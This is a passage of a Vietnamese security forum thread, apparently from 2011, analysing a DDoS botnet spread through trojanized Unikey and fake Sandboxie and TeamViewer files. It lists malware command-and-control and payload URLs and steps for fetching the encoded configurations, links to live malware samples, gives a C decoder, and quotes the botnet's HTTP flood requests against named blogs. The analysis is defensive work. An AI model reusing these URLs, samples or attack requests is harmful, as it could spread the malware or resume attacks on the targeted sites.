Qua điều tra (từ danh sách các IP trong bài này: /hvaonline/posts/list/39575.html#244574), em thấy rằng 100% các IP còn sống trong danh sách ấy đều mở cổng 8080 (http proxy) hoặc 3129 (squid proxy). Track lại tcpdump ở thời điểm ấy, vô số các requests dùng để DDoS HVA ngày hôm ấy đi xuyên qua các IP trên đều có thông tin "X-forwarded-For" hoặc "Via" IP nguyên thuỷ đằng sau proxies đều là IP đi từ Việt Nam. Điều này chứng tỏ, nguồn DDos này đã sử dụng hàng loạt các proxy servers (có thể là các proxy mở hoặc các proxy có cẩu hình thiếu chặt chẽ) để tấn công. Đối với trình duyệt và web services thì chuyện ẩn nấp sau proxies để "giấu IP" là chuyện thường thấy nhưng việc này cũng không thể qua mặt được "low level" tcpdump capture. Đối với 50Gb data đi xuyên 500 proxies thì khó nhận biết (vì 50Gb / 500 = 102Mb) nhưng nếu sử dụng phương tiện này để DDoS dai dẳng thì trước sau đám quản lý proxies cũng sẽ nghi ngờ và shutdown service. Có thể loạt DDoS ngày hôm ấy không phải của STL mà từ một nhóm nào khác "tát nước theo mưa". Loạt DDoS này có một số tính chất khá giống như các con "bots" của STL nhưng để khẳng định 100% thì không thể.]]>
/hvaonline/posts/list/39641.html#244787 /hvaonline/posts/list/39641.html#244787 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. http://net.iadze.com/backgrounds.jpg lại được cập nhật. Lần này, danh sách các site bị DDOS kéo dài hơn, đột ngột, không biết vì lý do gì. Ngoài danlambaovn.blogspot.com, còn thêm 7 site khác: [url] http://danlambaovn.blogspot.com http://www.dangvannham.com http://bienxua.over-blog.fr http://www.hanoihot.com http://www.aihuuphuyen.org http://nguoiduatinkami.wordpress.com http://vrvradio.com http://danlambaovn.disqus.com [/url] Trừ danlambaovn.blogspot.com là vô được, còn tất cả cád site còn lại tôi vô không được tới thời điểm này, tê liệt luôn. Lần này mấy anh "sống chết theo lệnh" hết gắn được cái nhãn "sống chết phập phù" của mấy anh vào mấy site đó, tức quá chơi đểu bằng cách DDOS ha ? Chơi bẩn vậy ha ?]]> /hvaonline/posts/list/39641.html#244795 /hvaonline/posts/list/39641.html#244795 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. TIẾP TỤC THÔNG BÁO KẾT QUẢ KIỂM TRA THỰC TẾ CÁC MẪU VIRUS-TROJAN CỦA STL Kiểm tra và phân tích file Unikey do bạn axasin cung cấp, chúng ta có thể tóm tắt những kết luận sau: 1- Trên mạng hiện đang có rất nhiều version Unikey. Có loại không bị nhúng virus vào (như Unikey download trực tiếp từ unikey.org), nhiều loại bị nhúng virus, trong đó đa phần là virus của STL. Việc RCE các version Unikey giúp xác định khá chính xác những version nào là malicious Unikey, version nào là origin-clean Unikey. Tuy nhiên RCE là kỹ thuật advanced, chỉ có rất ít người có thể thưc hiện. Các người sử dụng thông thương cần những khuyến cáo đơn giản, dễ áp dụng, để tránh cài nhầm vào máy các malicious Unikey (Unikey độc, có virus). Vả lại kỹ thuật RCE đơn thuần có thể không phát hiện hay chỉ ra đầy đủ quá trình virus thâm nhập và khởi phát thưc tế trong máy. Unikey (do bạn axasin phát hiện và cung cấp) là loai Stand-alone program. Nghĩa là bản Unikey này không cần cài đặt (vào HDH) mà chỉ cần copy và paste nó lên màn hình (desktop) để chạy nó (hoăc copy folder chứa Unikey vào một thư muc trong Program Files và send một shortcut ra desktop). Dung lượng của file Unikey.exe này là 666 KB (khá lớn). Đây là điểm chúng ta cần đặc biệt chú ý Xem hình 1 2- Khi nhấp chuột vao Unikey.exe thì trong máy xuất hiện (ngay tức khắc) một số file chính như sau: - MsHelpCenter.exe - MsHelpCenter.idx - _desktop.ini (phân biệt với file gốc desktop.ini của Windows, dung lương chỉ là khoảng 1KB) - RCX38C.tmp - thumbcache.db Cả 5 file này nằm trong một folder có tên là Microsoft Help, tai thư mục C;/WINDOWS/ (trên WinXP, Win2K3...). Đây là folder mới chứa 5 file mới nói trên mà virus tạo lập ngay sau khi nó vừa được kích hoat. Chúng (5 file trên) không phải là các file sẽ đươc virus của STL download trên mang về sau này, dù dung lượng của các file MsHelpCenter,* khá lớn (8-10 MB) Thưc ra dung lượng của từng file trong 2 file MsHelpCenter.* thay đổi theo các lần thử nghiêm. Thử nghiệm lần 2, tôi thấy dung lượng của chúng giảm hẳn, chỉ còn từ 2-3 MB. Theo tôi lý do của vấn đề dung lương các file MsHelpCenter.* khá lớn và thay đổi có lẽ do sau khi được virus tạo lập trong hệ thống, chúng map một số file khác trong hệ thống và thu gom về một số dữ liệu , cần thiết và không cần thiết (để cho dung lương lớn hơn, người dùng không nghi ngờ) Trong 5 file trên Avira antivirus chỉ phát hiện ra 2 file nhiễm virus là MsHelpCenter.idx và RCX38C.tmp. Avira phát hiện ngay khi files vừa đươc virus tạo lập ra. Xem hình 2. 3- Một điều theo tôi rất đáng lưu ý là: Sau khi STL virus được kích hoạt trong hệ thống (máy), thì chúng xoá ngay (delete) thành phần virus nhúng trong file Unikey.exe, làm cho dung lương của nó giảm hẳn, từ 666 KB xuống còn 256 KB. Điều đó cũng giúp cho Unikey.exe (nay đã sạch virus) chạy nhanh và ổn định hơn, thoả mãn yêu câu người dùng (họ sẽ không thắc mắc gì). Xem hình 3 4- Virus hay chính xác hơn là Windows cũng tạo lập các file liên quan đến MsHelpCenter.* (đuôi .pf) trong thư mục "Prefetch" tại C:/WINDOWS/. Mục đích của việc tạo lập các file .df này là: Các file MsHelpCenter.* khi khởi đông (start) trong hệ thống chúng trước hết access vào nhiều file hay một phần của các file và load các file hay các phần của files lên bộ nhớ (memory), để hoàn tất quá trình khởi động. Windows thiết lập các file .df nói trên để giúp cho quá trình khởi đông MsHelpCenter,* nhanh hơn. Các file và các phần trong files cần load lên bộ nhớ nói trên, sẽ đươc lưu trong các file .df và chúng được Windows load nhanh lên bộ nhớ ngay khi MsHelpCenter,* được kích hoạt và giúp cho quá trình khởi đông MsHelpCenter.* nhanh hơn. Xem hình 4. 5- Process MsHelpCenter.exe đóng một vai trò quan trọng, nhưng nó là một hiden process nên khó phát hiện là nó đang chạy thường trực trong hệ thống và được load lên bộ nhớ, vì vậy việc delete nó một cách bình thường, sẽ khó khăn. Xem hình 5 6- Khi chạy trong hệ thống, MsHelpCenter.exe tạo lập một kết nôi Internet đến một webserver. Chắc đây là một master-website. MsHelpCenter.exe mở rất nhiều thread (cổng TCP) gửi các gói tin cỡ 60B để kết nối đến cổng 80 TCP của webserver nói trên. Đia chỉ IP của webserver nay là: 178.162.225.253, webserver này có domain là mtiw253.westhomesite.info. Tại thời điểm tôi thử nghiệm webserver này không hoạt đông (inactive-offline). Vì vậy chưa xác định được là MsHelpCenter.exe sẽ download file gì (file image gì?) về máy. Quá trình thử nghiêm cần được tiếp tục theo dõi. Tôi nghĩ sẽ có lúc webserver này sẽ active. Xem hình 6a và 6b
Hinh 1- Các file nguyên thuỷ của Unikey do axasin cung cấp
Hình 2- Các file mới được vírus tao lập tại Microsoft Help Folder
Hình 3- Sau khi Unikey đươc cài, phần virus nhúng trong Unikey.exe bị xoá
Hình 4- File MshelpCenter.exe....pf trong Prefetch folder
Hình 5- Hiden process MsHelpCenter.exe
Hình 6a- Kết nối Internet tạo lập bởi MsHelpCenter.exe
Hình 6b- Các packet và connection tao lập bởi MsHelpCenter.exe ]]>
/hvaonline/posts/list/39641.html#244799 /hvaonline/posts/list/39641.html#244799 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. http://nethoabinh.com/showthread.php?t=315 Giờ file này đã được xoá :)
]]>
/hvaonline/posts/list/39641.html#244803 /hvaonline/posts/list/39641.html#244803 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244819 /hvaonline/posts/list/39641.html#244819 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Bat dau tu 30/07/2011, uxtheme.manifest se download virus tu: URL1: http://map.priper.info:8080/flower.bmp Neu fail, no se down tu 2 host sau: URL2: http://daily.openns.info:8080/flower.bmp URL3: http://sec.seamx.net:8080/flower.bmp VD URL day du khi no download: http://map.priper.info:8080/flower.bmp?g={B4EE5266-759C-474A-B216-A6BCC12A6456}&c=1&v=1&tf=312219152140&tr=111111111111&t=312219152140&p=2&e=0&n=abcde&u=abc&waclwugzwooyeyvhlja=yvqexeqbkwgdhejtuuvyps Tu flower.bmp, uxtheme.manifest extract ra URL sau (ta cung co the dung tool DecodeBmp.exe de extract). URL2: http://map.priper.info:8080/aqua.bmp UxTheme.manifest se extract data tu aqua.bmp ra file SbieCtrl.exe. Ta cung co the dung DecodeBmp.exe de extract ra SbieCtrl.exe. SbieCtrl.exe khi run se extract ra 2 file mao danh Sandboxie: SbieSvc.exe va SbieMgm.dll SbieMgm.dll chinh la con bot de DDOS. No se download config file tu 1 trong cac URL sau: http://net.iadze.com/backgrounds.jpg http://net.iadze.com/fronts.jpg http://find.instu.net/backgrounds.jpg http://find.instu.net/fronts.jpg IP cua net.iadze.com: 178.32.95.119:80. User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Ta co the download backgrounds.jpg tu 1 trong 4 URL tren, dung cac tool nhu Wget, Malzila, Fiddler. Bat buoc phai config voi User-Agent tren. Neu khong se tra ve HTML respond mao danh: Account suspended. Sau do dung tool DecodeJPG.exe de giai ma file backgrounds.jpg ra file backgrounds.gz Unzip backgrounds.gz bang 7Zip, WinRAR hay WinZip, ta se co file text cau hinh DDOS cua stl. Cac tool DecodeBmp, DecodeJPG da up o: http://www.mediafire.com/?5g7r7c8eme0wjp2  
Các link download tool: 1. Wget: http://users.ugent.be/~bpuype/wget/ 2. Malzilla: http://malzilla.sourceforge.net 3. Fiddler: http://www.fiddler2.com/ Cả 3 tool đều free, có cái opensource. Malzila được code = Delphi, Fiddler: C#, Wget: C. Tui sẽ post hướng dẫn dùng các tool này sau, nhưng thực ra rất dể, các bạn mày mò một chút là làm được, có thể tự download bmp về, download jpg về, dùng DecodeBmp và DecodeJPG giải mã ra hai file SbieCtrl.exe và backgrounds.txt. Chỉ khó một chút ở kỹ thuật debug hay static extract SbieSvc.exe và SbieMgm.dll từ SbieCtrl.exe (Aqua.bin). Tui sẽ post cách extract sau. Mẫu Fake Sandboxie ngày 04-08-2011: http://www.mediafire.com/?04srzu9n2p4yx7x Mẫu Fake Sandboxie ngày 09-08-2011: http://www.mediafire.com/?bpqq7mb7i5jxovk Trong mẫu ngày 09-08-2011, có cả hai file source của môt project open source mà coder của stl đã ăn cắp 100%: socks.cpp và socks.h. 2 invisible_love: Cảm ơn em đã khen, anh là dân CK nhưng CK lại "mù tịt" thì sao ? ]]>
/hvaonline/posts/list/39641.html#244822 /hvaonline/posts/list/39641.html#244822 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244825 /hvaonline/posts/list/39641.html#244825 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244826 /hvaonline/posts/list/39641.html#244826 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. 1. SbieSvc.exe 2. SbieMgm.dll 3. TeamViewer_Desktop.exe 4. themeui.manifest 5. uxtheme.manifest 6. TeamViewer.exe Bà con tìm từng Exe process trên = TaskManager hay dùng tool: Process Explorer của SysInternals, Process Hacker ( http://sourceforge.net/projects/processhacker) trên máy mình. Nếu có, kill process, sau đó xóa các file kể trên đi.]]> /hvaonline/posts/list/39641.html#244827 /hvaonline/posts/list/39641.html#244827 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Từ từ rồi tui sẽ post phân tích kỹ thuât RCE, cách thức hoạt động của các con Fake xxx, các con núp bóng Bmp file trên sau. Giờ thì lo tìm bot, host mới của tụi stl này đã ! Bà con thông cảm !  
Bác TQN sớm sớm post mấy bài hướng dẫn mọi người RCE đi, em thì có đầy đủ các Tools RCE rồi mà không biết cách để làm, có lẽ là do vẫn chưa hiểu được nền tảng và kỹ thuật căn bản. Em có đọc qua mấy bài "crack me" của bác Kienmanowar thì làm được nhưng vụ RCE này thì vẫn chưa biết. hic hic.]]>
/hvaonline/posts/list/39641.html#244828 /hvaonline/posts/list/39641.html#244828 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. 1. http://map.priper.info:8080/flower.bmp 2. http://map.priper.info:8080/aqua.bmp 3. http://daily.openns.info:8080/flower.bmp 4. http://sec.seamx.net:8080/flower.bmp 5. http://net.iadze.com/backgrounds.jpg 6. http://net.iadze.com/fronts.jpg 7. http://find.instu.net/backgrounds.jpg 8. http://find.instu.net/fronts.jpg 9. http://penop.net/top.jpg 10. http://penop.net/images01.gif Để đề phòng HVA ta bị DDOS nặng, không vào được, em mượn cái blog của ThangCuAnh: thangcuanh.blogspot.com để post song song luôn (sẵn tiện quãng cáo cái blog vắng hơn chùa Bà Đanh). Lỡ HVA không vào được thì em post ở http://thangcuanh.blogspot.com. Bà con có thể vào đây đọc. Blogspot của Google thì cho tụi stl DDOS mệt nghĩ luôn. PS: Chắc tụi stl sẽ cập nhật backgrounds.jpg của nó, ra lệnh DDOS cái blog cùi bắp của ThangCuAnh quá ;) Em công nhận mấy anh stl giàu kinh thiệt nhe ! Kinh phí cực kỳ dồi dào, host bát ngát luôn. Có cái nào mấy anh quên, bỏ đi không, nhớ cho em và các anh em HVA ta vài cái "xài chơi" nhé !!!???]]> /hvaonline/posts/list/39641.html#244830 /hvaonline/posts/list/39641.html#244830 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244831 /hvaonline/posts/list/39641.html#244831 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Hì hì, angel_of_devil nhầm to rồi: CK = Cơ Khí đó anh Hai ! Làm em tự hỏi: quái, tại sao lại có Skype với Chứng Khoán gì ở đây. Em có biết chứng khoán là gì đâu ? Vậy là danh sách bot, "mèo què" mới của stl đã có thêm các em sau, theo thứ tự từ mới đến cũ: 1. SbieSvc.exe 2. SbieMgm.dll 3. TeamViewer_Desktop.exe 4. themeui.manifest 5. uxtheme.manifest 6. TeamViewer.exe Bà con tìm từng Exe process trên = TaskManager hay dùng tool: Process Explorer của SysInternals, Process Hacker ( http://sourceforge.net/projects/processhacker) trên máy mình. Nếu có, kill process, sau đó xóa các file kể trên đi. 
Khi download Teamviewer 6 (version6) từ trang chủ của Teamviewer (Teamviewer.com) thì sau khi cài đặt trong may của ta có các file chạy là:
- TeamViewer.exe (7.816KB) - TeamViewer_.exe (3.963KB) - TeamViewer_Desktop.exe (2.071KB) - TeamViewer_Service.exe (2.283KB) - tv_w32.exe - tv_x64.exe 
Các file này nằm ở thư muc \Program files\TeamViewer\Version6\ khi cài TeamViewer6 theo chế độ "install" (nghĩa là cài vào OS) hay nằm ở C:\Documents and Settings\User\Local Settings\Temp\TeamViewer\Version6\ khi cài ở chế độ "run" (nghĩa là không cài TeamViewer vào OS mà sử dụng nó như một stand-alone program) Vì vậy ý anh TQN nhắc xoá các file TeamViewer_Desktop.exe hay TeamViewer.exe trong máy các bạn là khi chúng đã bị STL nhúng virus vào hay chúng là virus nhưng mạo nhận tên các file chính thức của TeamViewer. Một cách phân biệt đơn giản, nhanh chóng là so sánh dung lượng giữa file nghi ngờ và file nguyên thuỷ của TeamViewer (dung lương chuẩn trên XP tôi đã ghi chú ở trên) Chú ý là khi ta khởi động Teamviewer trên may ở cả chế độ run hay install thì máy ta sẽ kết nối với các máy chủ của Teamviewer và sau đó máy chủ của Teamviewer mới kết nối đến máy của partener (máy ta muốn truy cập đến và theo rõi màn hình) Thí dụ
Action:Monitored Application:TeamViewer.exe Access:Outbound TCP access Object:1359 -> 87.230.74.43 (master4.teamviewer.com):5938 Time:8/10/2011 11:06:10 AM Application:TeamViewer.exe Access:Outbound TCP access Object:1360 -> 95.211.37.198 (server3310.teamviewer.com):5938 Time:8/10/2011 11:06:11 AM  
Chú ý teamviewer có nhiều server sử dụng các subdomain khác nhau của Teamviewer.com (thí dụ master4....). Vì vậy tên các subdomain có thể thay đổi khi ta kết nối lại. Như vậy rõ ràng là Teamviewer group có thể xem và vào máy của ta nếu họ muốn như vậy (đặc biệt khi ta sử dụng máy với quyền admin). Thế là ta cảm thấy có điều gì... lăn tăn rồi đấy. Phải không các bạn? Vì vậy đối với các webserver, muốn remote control nó, thì không nên dùng Teamviewer. Tôt nhất là dùng card remote control trên máy (hardware) và kết nối thông qua IP, có thể dùng SSH hay Real VNC enterprise (shareware). ]]>
/hvaonline/posts/list/39641.html#244835 /hvaonline/posts/list/39641.html#244835 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Có một chuyện kể ra không biết vui hay buồn. Thứ 7 vừa rồi có đi nhậu với một người bạn cũ, hồi xưa cũng là thợ code như mình, giờ vẫn còn làm IT và đã lên PM. Cậu ta cũng có biết về vụ này và cũng đã vào đọc. Khi đang nhậu, nói chuyện stl, cậu ta cứ thắc mắc: 1. Tại sao có mấy file mạo danh của stl không có đuôi .exe, tui không double click vô thì làm sao nhiểm virus vô máy tui được ? 2. Nhiều file như StaticCaches.dat, uxtheme.manifest... là các DLL. Các DLL này làm sao tự run được ? 3. Nó download bmp về thì làm sao sinh ra bot mới được ? Mình phải ngồi "thuyết trình" một hồi, hết mấy chai bia thì nó mới hiểu, nhưng theo tui thì chắc cũng hiểu "sơ sơ" à ! Từ từ rồi tui sẽ post phân tích kỹ thuât RCE, cách thức hoạt động của các con Fake xxx, các con núp bóng Bmp file trên sau. Giờ thì lo tìm bot, host mới của tụi stl này đã ! Bà con thông cảm !  
Cái này thì bác phải cảm thấy vui mới phải, vì cuối cùng thằng bạn của mình cũng thoát được kiếp KU-DER (coder). Thực ra ông bạn của TQN bây giờ lên làm P.M rồi, mà mấy tên P.M bây giờ chỉ chăm chăm luyện thi PMP thôi ;), súng nổ vang trời cho oai, chứ code kiếc gì thì đã vứt sạch. Ngoài nguyên nhân đó, còn một nguyên nhân khác là hiện tại phần lớn Vietnamese KUDER(s) toàn làm outsource cho các công ty nước ngoài, và họ chỉ tập trung vào giải quyết BUSINESS, thay vì tập trung vào HỆ THỐNG. Nên kỹ thuật RCE, hay am hiểu về hệ thống có giới hạn. Nhưng cũng hơi ngạc nhiên là ông bạn của bác trước đây có làm code rồi bảo là cần phải click vào file .EXE để nó chạy. Btw, chắc ông bạn của bác bây giờ chỉ có cái VIEWs của END-USERs chứ không có cái VIEWs máy móc của anh anh KUDER(s),]]>
/hvaonline/posts/list/39641.html#244836 /hvaonline/posts/list/39641.html#244836 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244839 /hvaonline/posts/list/39641.html#244839 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Vd nhé: Chuỗi hex string của mấy anh, mấy anh dùng sscanf(xxx, "02X", xxx) để đổi từng cặp hex string ra character. Đầu chuỗi, mấy anh lấy 2 ký tự đầu làm len, lưu cả chuỗi hex vào GDIPlusX key. Giả sử em chơi set 0xFF 0xFF vào đầu cái hex string trong registry đó, bằng tool em phổ biến chẵng hạn, thì con "mèo què" của mấy anh crash không ???? Suy nghĩ kỹ rồi trả lời bằng PM cho em nhé ! Còn nữa, mấy anh sao cứ khoái xài memset, memcpy quá ! Code vậy có optimize không ? Hay kệ cha nó, chạy được, phá được để mấy anh báo cáo xếp Nguyễn Xuân xxxx, Nguễn Nam xxxx là được rồi, phải không mấy anh ???? 
Em thấy bác hay than phiền ở những đoạn này. Xét về phía virus maker mà nói thì đó chính là những chiêu obfuscation AV trên máy nạn nhân. Hạn chế các tác vụ check. Chạy được/ phá được là được rồi. PS: sếp NXT, xxx là ai thế bác? ]]>
/hvaonline/posts/list/39641.html#244841 /hvaonline/posts/list/39641.html#244841 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244842 /hvaonline/posts/list/39641.html#244842 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244846 /hvaonline/posts/list/39641.html#244846 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

Nowhereman wrote:
tôi xin có một vài ý ciến như sau : a) STL là một tổ chức tội phạm việt nam sống dưới những tên cơ quan, tổ chức. b) Chẳng có thàng tàu khựa nào tham gia vào vụ DDOS với mailwale made in Viêt cộng này cả . c) Theo tôi kô nên sử dụng các phần mềm diệt virus trong nước, vì bạn thử nghĩ xem bao nhiêu người có thể ngờ rằng, nằm sâu thẳm trong linh hồn những phần mềm "bảo vệ" đó là vài dòng lệnh quản lý và điều hành mọi điều thuộc về bạn. ngay sau khi bạn click install ? . >> trong một cuộc chiến, mọi bên đều có lý do; đúng, sai, phải trái = chịu!!! 
Thế dùng phần mềm nước ngoài thì đảm bảo là an toàn đấy. Nếu muốn an toàn thì tốt nhất là đừng dùng internet.]]>
/hvaonline/posts/list/39641.html#244849 /hvaonline/posts/list/39641.html#244849 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

rang0 wrote:

Nowhereman wrote:
tôi xin có một vài ý ciến như sau : a) STL là một tổ chức tội phạm việt nam sống dưới những tên cơ quan, tổ chức. b) Chẳng có thàng tàu khựa nào tham gia vào vụ DDOS với mailwale made in Viêt cộng này cả . c) Theo tôi kô nên sử dụng các phần mềm diệt virus trong nước, vì bạn thử nghĩ xem bao nhiêu người có thể ngờ rằng, nằm sâu thẳm trong linh hồn những phần mềm "bảo vệ" đó là vài dòng lệnh quản lý và điều hành mọi điều thuộc về bạn. ngay sau khi bạn click install ? . >> trong một cuộc chiến, mọi bên đều có lý do; đúng, sai, phải trái = chịu!!! 
Thế dùng phần mềm nước ngoài thì đảm bảo là an toàn đấy. Nếu muốn an toàn thì tốt nhất là đừng dùng internet. 
Đối với malware của STL thì nên dùng phần mềm của symantec -:-) ]]>
/hvaonline/posts/list/39641.html#244852 /hvaonline/posts/list/39641.html#244852 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244855 /hvaonline/posts/list/39641.html#244855 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244856 /hvaonline/posts/list/39641.html#244856 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
#include <stdio.h>
#include <conio.h>
#include <windows.h>

int main(int argc, char *argv[])
{
	FILE *f; int i;
	long lSize;
	char *pBuffer, *p;
	char v24,v23; 
	int v7 = 0;
	
	
	char szOutPut[MAX_PATH] = "";

	if ((argc <2) || (argc >3 ))
	{
		printf("Usage: Decode <Encrypted> <Result>");
		exit(1);

	}
	if (argc == 2)
	{
		strcpy(szOutPut, "Decoded.txt");
	}
	else strncpy(szOutPut, argv[2],MAX_PATH);

	f = fopen(argv[1], "rb"); //doc file da ma hoa

	if (f)
	{
		fseek(f, 0, SEEK_END);
		lSize = ftell(f);
		fseek(f, 0, SEEK_SET);

		pBuffer =(char*) malloc(lSize+1024);
		if(pBuffer)
		{
			
			p = (char *)pBuffer+ 4;
			memset(pBuffer, 0, lSize+1024);
			fread((char*)pBuffer, lSize, 1, f);

			for ( i = 8; i < lSize; ++i )
			{
				v24 = p[v7 % 4];
				v23 = pBuffer[i];
				v23 = (v24 ^ v23) % 256;
				pBuffer[i] = v23;
				v7++;
				//v8 += v23 * v7++ % 7;
			}
		}
		fclose(f);


		if (pBuffer)
		{
			f = fopen(szOutPut, "wb");
			if (f)
			{
				fwrite((char*)pBuffer, lSize, 1, f); // ghi lai noi dung da giai ma
				fclose(f);
			}
			else printf("Can not open output file.");
			delete[] pBuffer ;
		}
	}
	else printf("Can not open input file.");
	return 0;
}
bạn này vẫn dùng http://second.dinest.net/xv.jpg http://second.dinest.net/xc.jpg , user agent như cũ. Các thành phần khác đang phân tích.... O-) ]]>
/hvaonline/posts/list/39641.html#244860 /hvaonline/posts/list/39641.html#244860 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Không phải chỉ mình mấy anh ấy, tui đã gặp rất nhiều coder C++ rồi, code ầm ầm, nhưng kỹ năng debug, hiểu hệ thống, hiểu compiler thì rất hạn chế. PS: Anh nói đúng không, rồng châu Á ? Cũng là dân RCE, em đồng ý với anh chứ ?   Em nghĩ không phải rất nhiều mà em nghĩ ít cũng 90% Coder (cho tất cả các loại ngôn ngữ lập trình) đều không quan tâm đến việc tìm hiểu hệ thống và compiler vì xu hướng phát triển của Coder là hướng "lên". Tức là sẽ hướng tới tổ chức code , quản lý module, quản lý dự án, tổ chức test cases,... (như hướng đi của em hiện tại) --> Software Engineering Phần 10% còn lại vì lý do phải lập trình hệ thống nên hướng đi "xuống". Tức là tìm hiểu chuyên sâu về hệ điều hành, mã sinh, bảo mật,driver,... thì mới có điều kiện đi sâu vào nghiên cứu, tối ưu --> Reverse Engineering. Vì vậy em hoàn toàn đồng ý với anh về điểm này. ]]> /hvaonline/posts/list/39641.html#244862 /hvaonline/posts/list/39641.html#244862 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Không phải đâu cino, tui không than phiền đâu. Mấy cái đó mà là obfuscation, polymoxxx gì đó thì em đi đầu xuống đất luôn, bỏ nghề tay trái RCE luôn. Tui từng làm coder và R&D gần chục năm, mấy cái lỗi đó chỉ đơn thuần là lỗi code của coder thôi bạn, chả có obfuscation, polyxxx (đa hình) hay đánh lừa AV gì ráo hết. Phải gọi là code stupid, "ngớ ngẫn" ! 
Chào bác. Đấy là em nghĩ tới phương diện là 1 con malware transparent với AV - với những công nghệ Heuristic, Sandbox... "thông minh" cũng thừa sức analyze đám "clearly malware" như vầy, chưa kể AV cấp cao còn có chức năng scan network traffic/ header... Rồi với những con "siêu đa hình" cũng bị dập cho bẹp gí thì sá gì con cùi bắp của mấy attacker đang đề cập ở đây. Em không nói đến ở mức độ decompile, disasm, operator hay coding convention, tier architecture, software en.. gì gì gì. Và em chưa từng thử, cũng như chưa từng view processes của mấy mẫu gửi ở đây. Trình em từ lâu tới giờ máy mó "thực hành" con IDM (Internet Download Manager) toàn failed over thì lấy đâu ra. Tiện thể em nghĩ các bác scan mấy chú IDM hàng chùa xem thử, thứ đó cũng phổ biến chả kém gì Unikey hay Vietkey đâu. Đấy là chưa kể các Hệ điều hành 10k/disk bán ngoài chợ, lâu lâu lại phòi ra 1 chú "quản trị cấp hệ thống" hù chơi. Thảm hoạ chẳng kém gì "Da nâu" của dòng nhạc Việt :)]]>
/hvaonline/posts/list/39641.html#244864 /hvaonline/posts/list/39641.html#244864 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244865 /hvaonline/posts/list/39641.html#244865 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

cino wrote:
.... Đấy là chưa kể các Hệ điều hành 10k/disk bán ngoài chợ, lâu lâu lại phòi ra 1 chú "quản trị cấp hệ thống" hù chơi. Thảm hoạ chẳng kém gì "Da nâu" của dòng nhạc Việt :) 
- Em cũng đang sài Hệ Điều Hành 6k đó anh, anh có thể chỉ em làm cách nào để phát hiện chú "quản trị cấp hệ thống" để em góp phần tiêu diệt đám stl? ]]>
/hvaonline/posts/list/39641.html#244866 /hvaonline/posts/list/39641.html#244866 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. http://net.iadze.com/backgrounds.jpg lại thay đổi, cường độ tấn công vào danlambaovn.blogspot.com tăng mạnh hơn: Code:
1. GET / HTTP/1.1\r\nHost: danlambaovn.blogspot.com\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 115\r\nConnection: keep-alive
 http://danlambaovn.blogspot.com
2. GET / HTTP/1.1\r\nHost: www.dangvannham.com\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 115\r\nConnection: keep-alive
 http://www.dangvannham.com
3. GET / HTTP/1.1\r\nHost: bienxua.over-blog.fr\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 115\r\nConnection: keep-alive
 http://bienxua.over-blog.fr
4. GET /f/index.php HTTP/1.1\r\nHost: www.hanoihot.com\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 115\r\nConnection: keep-alive
 http://www.hanoihot.com
/f/index.php
5. GET / HTTP/1.1\r\nHost: www.aihuuphuyen.org\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 115\r\nConnection: keep-alive
 http://www.aihuuphuyen.org
6. GET / HTTP/1.1\r\nHost: nguoiduatinkami.wordpress.com\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 115\r\nConnection: keep-alive\r\nReferer: http://nguoiduatinkami.wordpress.com/
 http://nguoiduatinkami.wordpress.com
